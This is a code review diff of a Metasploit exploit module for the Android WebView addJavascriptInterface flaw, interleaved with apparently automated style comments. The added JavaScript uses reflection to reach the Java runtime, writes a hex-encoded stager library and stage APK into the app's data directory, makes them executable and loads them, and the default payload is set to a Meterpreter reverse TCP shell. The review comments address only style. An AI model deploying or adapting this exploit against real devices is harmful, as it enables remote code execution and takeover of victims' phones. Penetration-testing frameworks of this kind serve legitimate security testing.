diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
index 40c5461117..344403fd8e 100644
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote
 ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
 ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
 ],
- 'Platform' => 'linux',
- 'Arch' => ARCH_ARMLE,
- 'DefaultOptions' => { 'PrependFork' => true },
+ 'Platform' => 'android',
+ 'Arch' => ARCH_DALVIK,
+ 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },
 'Targets' => [ [ 'Automatic', {} ] ],
 'DisclosureDate' => 'Dec 21 2012',
 'DefaultTarget' => 0,
@@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
 send_response_html(cli, html)
 end
 
+ def dalvikstager()
+ localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so')
+ data = File.read(localfile, {:mode => 'rb'})
+ data
+ end
+
 def js
 %Q|
 function exec(obj) {
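Review bot: The new `'DefaultOptions'` hash literal carries a trailing comma before the closing brace, which reads as a leftover in a single-line hash; `'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },` is cleaner. Dropping `'PrependFork' => true` looks intentional once the payload is a Dalvik stage rather than a forked native binary, but nothing in the hunk says so; a one-line comment above the option, `# Dalvik payload is loaded in-process, so no fork prepend`, would record that. The module info hash this sits in starts and ends outside the hunk.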
@@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote
 // get the runtime so we can exec
 var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
- var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
+ var runtime = m.invoke(null, null);
+ var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
+ var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
 
 // get the process name, which will give us our data path
- var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+ var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
 var ch, path = '/data/data/';
 while ((ch = p.getInputStream().read()) != 0) {
 path += String.fromCharCode(ch);
 }
- path += '/#{Rex::Text.rand_text_alpha(8)}';
+ var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
+ var stagePath = path + '/stage.apk';
 
- // build the binary, chmod it, and execute it
- m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
- m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
- m.invoke(null, null).exec([path]);
+ // build the library and chmod it
+ runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
+ runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+ // build the stage, chmod it, and load it
+ runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
+ runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+ runtime.load(libraryPath);
 return true;
 }
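Review bot: The new `dalvikstager` helper added in the previous hunk uses the pre-`binread` idiom `File.read(localfile, {:mode => 'rb'})` plus a redundant `data` local and empty `()` on the definition; `def dalvikstager` / `File.binread(File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so'))` / `end` is the same read in three lines, and a YARD `# @return [String] raw bytes of the bundled libdalvikstager.so` above it would document the only contract it has. In this hunk the pairing of the randomly named library with the fixed `stagePath = path + '/stage.apk'` is presumably a convention the native library relies on, but the hunk does not say so; a comment such as `// fixed name: must match what libdalvikstager.so opens` (confirm against the library source) would keep the two from drifting apart. The `js` method and the JavaScript `exec` function both begin in the earlier hunk and continue past the end of this one.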